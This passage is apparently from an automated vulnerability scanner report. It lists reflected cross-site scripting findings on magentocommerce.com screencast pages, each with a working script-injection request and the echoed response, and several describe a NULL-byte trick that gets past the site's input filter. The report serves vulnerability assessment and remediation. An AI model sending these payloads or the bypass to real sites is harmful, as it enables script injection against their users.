Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:15 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176075; expires=Sat, 11-Aug-2012 15:07:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A99%3A%22%2Fmedia%2Fscreencasts%2Fprivate-sales-including-events-invitations-and-category-access-permissions%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:55 GMT
Content-Length: 33641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view?%0091413"><script>alert(1)</script>c91b0ff721a=1">
...[SNIP]...
1.31. http://www.magentocommerce.com/media/screencasts/product-comparison/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/product-comparison/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a270"><script>alert(1)</script>52125fe349d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/product-comparison3a270"><script>alert(1)</script>52125fe349d/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176185; expires=Sat, 11-Aug-2012 15:09:45 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:45 GMT
Content-Length: 33501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/product-comparison3a270"><script>alert(1)</script>52125fe349d/view">
...[SNIP]...
1.32. http://www.magentocommerce.com/media/screencasts/product-comparison/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/product-comparison/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003a6ad"><script>alert(1)</script>eff1795c9ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3a6ad"><script>alert(1)</script>eff1795c9ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/product-comparison/view?%003a6ad"><script>alert(1)</script>eff1795c9ed=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176132; expires=Sat, 11-Aug-2012 15:08:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fmedia%2Fscreencasts%2Fproduct-comparison%2Fview%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:52 GMT
Content-Length: 33317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/product-comparison/view?%003a6ad"><script>alert(1)</script>eff1795c9ed=1">
...[SNIP]...
1.33. http://www.magentocommerce.com/media/screencasts/search/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/search/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfdc4"><script>alert(1)</script>6969d62cb31 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/searchdfdc4"><script>alert(1)</script>6969d62cb31/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176249; expires=Sat, 11-Aug-2012 15:10:49 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:49 GMT
Content-Length: 33489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/searchdfdc4"><script>alert(1)</script>6969d62cb31/view">
...[SNIP]...
1.34. http://www.magentocommerce.com/media/screencasts/search/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/search/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0066489"><script>alert(1)</script>107d780fdac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66489"><script>alert(1)</script>107d780fdac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/search/view?%0066489"><script>alert(1)</script>107d780fdac=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176207; expires=Sat, 11-Aug-2012 15:10:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Fscreencasts%2Fsearch%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:08 GMT
Content-Length: 33276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/search/view?%0066489"><script>alert(1)</script>107d780fdac=1">
...[SNIP]...
1.35. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/single-page-checkout-guest-checkout/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10b86"><script>alert(1)</script>e1f23b845dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/single-page-checkout-guest-checkout10b86"><script>alert(1)</script>e1f23b845dc/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176269; expires=Sat, 11-Aug-2012 15:11:09 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:09 GMT
Content-Length: 33518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout10b86"><script>alert(1)</script>e1f23b845dc/view">
...[SNIP]...
1.36. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/single-page-checkout-guest-checkout/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f92a3"><script>alert(1)</script>944016f3b45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f92a3"><script>alert(1)</script>944016f3b45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/single-page-checkout-guest-checkout/view?%00f92a3"><script>alert(1)</script>944016f3b45=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176250; expires=Sat, 11-Aug-2012 15:10:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fmedia%2Fscreencasts%2Fsingle-page-checkout-guest-checkout%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:50 GMT
Content-Length: 34222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view?%00f92a3"><script>alert(1)</script>944016f3b45=1">
...[SNIP]...
1.37. http://www.magentocommerce.com/media/screencasts/static-blocks/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/static-blocks/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b6e4"><script>alert(1)</script>98b5a898c24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/static-blocks3b6e4"><script>alert(1)</script>98b5a898c24/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176162; expires=Sat, 11-Aug-2012 15:09:22 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:22 GMT
Content-Length: 33496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/static-blocks3b6e4"><script>alert(1)</script>98b5a898c24/view">
...[SNIP]...
1.38. http://www.magentocommerce.com/media/screencasts/static-blocks/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/static-blocks/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00df3f4"><script>alert(1)</script>c995222f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as df3f4"><script>alert(1)</script>c995222f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/static-blocks/view?%00df3f4"><script>alert(1)</script>c995222f5e=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176072; expires=Sat, 11-Aug-2012 15:07:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Fstatic-blocks%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:52 GMT
Content-Length: 34345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/static-blocks/view?%00df3f4"><script>alert(1)</script>c995222f5e=1">
...[SNIP]...
1.39. http://www.magentocommerce.com/media/screencasts/transactional-email/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/transactional-email/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c3ea"><script>alert(1)</script>34fe324f96d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/transactional-email4c3ea"><script>alert(1)</script>34fe324f96d/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176233; expires=Sat, 11-Aug-2012 15:10:33 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:34 GMT
Content-Length: 33502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/transactional-email4c3ea"><script>alert(1)</script>34fe324f96d/view">
...[SNIP]...
1.40. http://www.magentocommerce.com/media/screencasts/transactional-email/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/transactional-email/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00996a5"><script>alert(1)</script>f2333fb71e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 996a5"><script>alert(1)</script>f2333fb71e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/transactional-email/view?%00996a5"><script>alert(1)</script>f2333fb71e2=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176167; expires=Sat, 11-Aug-2012 15:09:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Ftransactional-email%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:27 GMT
Content-Length: 34475

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/transactional-email/view?%00996a5"><script>alert(1)</script>f2333fb71e2=1">
...[SNIP]...
1.41. http://www.magentocommerce.com/media/screencasts/upsells/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/upsells/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fea2e"><script>alert(1)</script>1e31a06b711 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/upsellsfea2e"><script>alert(1)</script>1e31a06b711/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
